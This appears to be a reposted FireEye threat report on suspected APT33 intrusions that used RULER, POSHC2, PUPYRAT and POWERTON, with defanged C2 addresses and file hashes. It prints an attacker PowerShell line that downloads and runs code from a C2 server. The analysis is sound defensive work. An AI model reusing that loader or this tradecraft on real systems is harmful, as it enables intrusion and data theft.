Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

OVERRULED: Containing a Potentially Destructive Adversary


FireEye assesses APT33 may be behind a series of intrusions and

attempted intrusions within the engineering industry. Public reporting

indicates this activity may be related to recent destructive attacks.



has responded to and contained numerous intrusions that we

assess are related. The actor is leveraging publicly available tools

in early phases of the intrusion; however, we have observed them

transition to custom implants in later stage activity in an attempt to

circumvent our detection.

On Sept. 20, 2017, FireEye Intelligence published a blog post

detailing spear phishing activity


. Recent public reporting

indicated possible links between the confirmed APT33 spear phishing



; however, we were unable to independently verify

this claim. FireEye’s Advanced Practices team leverages telemetry and

aggressive proactive operations to maintain visibility of APT33 and

their attempted intrusions against our customers. These efforts

enabled us to establish an operational timeline that was consistent

with multiple intrusions Managed Defense identified and contained

prior to the actor completing their mission. We correlated the

intrusions using an internally-developed similarity engine described

below. Additionally, public discussions have also indicated that

specific attacker infrastructure we observed is possibly related to

the recent destructive SHAMOON attacks.

45 days ago, during 24×7 monitoring, #ManagedDefense

detected & contained an attempted intrusion from

newly-identified adversary infrastructure*.

It is C2 for a code family we track as POWERTON.

*hxxps://103.236.149[.]100/api/info ― FireEye (@FireEye)


15, 2018

Identifying the Overlap in Threat Activity FireEye augments our expertise with an


to evaluate potential associations and

relationships between groups and activity. Using concepts from

document clustering and topic modeling literature, this engine

provides a framework to calculate and discover similarities between

groups of activities, and then develop investigative leads for

follow-on analysis. Our engine identified similarities between a

series of intrusions within the engineering industry. The near

real-time results led to an in-depth comparative analysis. FireEye

analyzed all available organic information from numerous intrusions

and all known APT33 activity. We subsequently concluded, with medium

confidence, that two specific early-phase intrusions were the work of

a single group. Advanced Practices then reconstructed an operational

timeline based on confirmed APT33 activity observed in the last year.

We compared that to the timeline of the contained intrusions and

determined there were circumstantial overlaps to include remarkable

similarities in tool selection during specified timeframes. We assess

with low confidence that the intrusions were conducted by APT33. This

blog contains original source material only, whereas Finished

Intelligence including an all-source analysis is


. To best understand the

techniques employed by the adversary, it is necessary to provide

background on our Managed Defense response to this activity during

their 24×7 monitoring.

Managed Defense Rapid Responses: Investigating the Attacker

In mid-November 2017, Managed Defense identified and responded to

targeted threat activity at a customer within the engineering

industry. The adversary leveraged stolen credentials and a publicly

available tool, SensePost’s RULER , to configure a

client-side mail rule crafted to download and execute a malicious

payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f ).

The payload was an AutoIT downloader that retrieved and executed

additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm . The

follow-on PowerShell profiled the target system’s architecture,

downloaded the appropriate variant of PowerSploit (MD5:

c326f156657d1c41a9c387415bf779d4 or

0564706ec38d15e981f71eaf474d0ab8 ), and reflectively loaded

PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or

17587668AC577FCE0B278420B8EB72AC ). The actor leveraged a

publicly available exploit for CVE-2017-0213 to escalate privileges,

publicly available windows SysInternals PROCDUMP to dump the LSASS

process, and publicly available MIMIKATZ to presumably steal

additional credentials. Managed Defense aided the victim in containing

the intrusion.

FireEye collected 168 PUPYRAT samples for a comparison. While import

hashes (IMPHASH) are insufficient for attribution, we found it

remarkable that out of the specified sampling, the actor’s IMPHASH was

found in only six samples, two of which were confirmed to belong to

the threat actor observed in Managed Defense, and one which is

attributed to APT33. We also determined APT33 likely transitioned from

PowerShell EMPIRE to PUPYRAT during this timeframe.

In mid-July of 2018, Managed Defense identified similar targeted

threat activity focused against the same industry. The actor leveraged

stolen credentials and RULER’s module that exploits CVE-2017-11774

(RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages

for code execution and persistence. These methods are further explored

in this post in the "RULER In-The-Wild" section.

The actor leveraged this persistence mechanism to download and

execute OS-dependent variants of the publicly available .NET POSHC2

backdoor as well as a newly identified PowerShell-based implant

self-named POWERTON. Managed Defense rapidly engaged and successfully

contained the intrusion. Of note, Advanced Practices separately

established that APT33 began using POSHC2 as of at least July 2, 2018,

and continued to use it throughout the duration of 2018.

During the July activity, Managed Defense observed three variations

of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html . One example is

shown in Figure 1.

OVERRULED: Containing a Potentially Destructive Adversary
Figure 1: Attacker’s homepage exploit (CVE-2017-11774)

The main encoded payload within each exploit leveraged WMIC to

conduct system profiling in order to determine the appropriate

OS-dependent POSHC2 implant and dropped to disk a PowerShell script

named “Media.ps1” within the user’s %LOCALAPPDATA% directory ( %LOCALAPPDATA%\MediaWs\Media.ps1 ) as shown in

Figure 2.

OVERRULED: Containing a Potentially Destructive Adversary
Figure 2: Attacker’s “Media.ps1” script

The purpose of “ Media.ps1 ” was to decode

and execute the downloaded binary payload, which was written to disk

as “ C:\Users\Public\Downloads\log.dat ”. At a

later stage, this PowerShell script would be configured to persist on

the host via a registry Run key.

Analysis of the “ log.dat ” payloads

determined them to be variants of the publicly available POSHC2

proxy-aware stager written to download and execute PowerShell payloads

from a hardcoded command and control (C2) address. These particular

POSHC2 samples run on the .NET framework and dynamically load payloads

from Base64 encoded strings. The implant will send a reconnaissance

report via HTTP to the C2 server ( hxxps://51.254.71[.]223/images/static/content/ )

and subsequently evaluate the response as PowerShell source code. The

reconnaissance report contains the following information:

Username and domain Computer name CPU details Current exe PID Configured C2 server

The C2 messages are encrypted via AES using a hardcoded key and

encoded with Base64. It is this POSHC2 binary that established

persistence for the aforementioned “ Media.ps1 ” PowerShell script, which then decodes

and executes the POSHC2 binary upon system startup. During the

identified July 2018 activity, the POSHC2 variants were configured

with a kill date of July 29, 2018.

POSHC2 was leveraged to download and execute a new PowerShell-based

implant self-named POWERTON ( hxxps://185.161.209[.]172/api/info ) . The

adversary had limited success with interacting with POWERTON during

this time. The actor was able to download and establish persistence

for an AutoIt binary named “ ClouldPackage.exe ” (MD5:

46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON

“persist” command. The sole functionality of “ ClouldPackage.exe ” was to execute the following

line of PowerShell code:

= { $true }; $webclient = new-object System.Net.WebClient;
$webclient.Credentials = new-object
‘fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye’); iex $webclient.DownloadString(‘hxxps://185.161.209[.]172/api/default’)

The purpose of this code is to retrieve “silent mode” POWERTON from

the C2 server. Note the actor protected their follow-on payloads with

strong credentials. Shortly after this, Managed Defense contained the intrusion.

Starting approximately three weeks later, the actor reestablished

access through a successful password spray. Managed Defense

immediately identified the actor deploying malicious homepages with

RULER to persist on workstations. They made some infrastructure and

tooling changes to include additional layers of obfuscation in an

attempt to avoid detection. The actor hosted their homepage exploit at

a new C2 server ( hxxp://5.79.66[.]241/index.html ). At least three

new variations of “ index.html ” were

identified during this period. Two of these variations contained

encoded PowerShell code written to download new OS-dependent variants

of the .NET POSHC2 binaries, as seen in Figure 3.

OVERRULED: Containing a Potentially Destructive Adversary
Figure 3: OS-specific POSHC2 Downloader

Figure 3 shows that the actor made some minor changes, such as

encoding the PowerShell " DownloadString " commands and renaming the

resulting POSHC2 and .ps1 files dropped to disk. Once decoded, the

commands will attempt to download the POSHC2 binaries from yet another

new C2 server ( hxxp://103.236.149[.]124/delivered.dat ). The name

of the .ps1 file dropped to decode and execute the POSHC2 variant also

changed to “ Vision.ps1 ”. During this August

2018 activity, the POSHC2 variants were configured with a “kill date”

of Aug. 13, 2018. Note that POSHC2 supports a kill date in order to

guardrail an intrusion by time and this functionality is built into

the framework.

Once again, POSHC2 was used to download a new variant of POWERTON

(MD5: c38069d0bc79acdc28af3820c1123e53 ), configured to

communicate with the C2 domain hxxps://basepack[.]org . At one point in

late-August, after the POSHC2 kill date, the adversary used

RULER.HOMEPAGE to directly download POWERTON, bypassing the

intermediary stages previously observed.

Due to Managed Defense’s early containment of these intrusions, we

were unable to ascertain the actor’s motivations; however, it was

clear they were adamant about gaining and maintaining access to the

victim’s network.

Adversary Pursuit: Infrastructure Monitoring

Advanced Practices conducts aggressive proactive operations in order

to identify and monitor adversary infrastructure at scale. The

adversary maintained a RULER.HOMEPAGE payload at hxxp://91.235.116[.]212/index.html between July 16

and Oct. 11, 2018. On at least Oct. 11, 2018, the adversary changed

the payload (MD5: 8be06571e915ae3f76901d52068e3498 ) to download

and execute a POWERTON sample from hxxps://103.236.149[.]100/api/info

(MD5: 4047e238bbcec147f8b97d849ef40ce5 ). This specific

URL was identified in a


as possibly related to recent destructive attacks. We

are unable to independently verify this correlation with any organic

information we possess.

On Dec. 13, 2018, Advanced Practices proactively identified and

attributed a malicious RULER.HOMEPAGE payload hosted at hxxp://89.45.35[.]235/index.html (MD5:

f0fe6e9dde998907af76d91ba8f68a05 ). The payload was crafted to

download and execute POWERTON hosted at hxxps://staffmusic[.]org/transfer/view (MD5: 53ae59ed03fa5df3bf738bc0775a91d9 ).

Table 1 contains the operational timeline for the activity we analyzed.




2017-08-15 17:06:59



2017-09-15 16:49:59

APT33 PUPYRAT (Compiled)

Viewing all articles
Browse latest Browse all 12749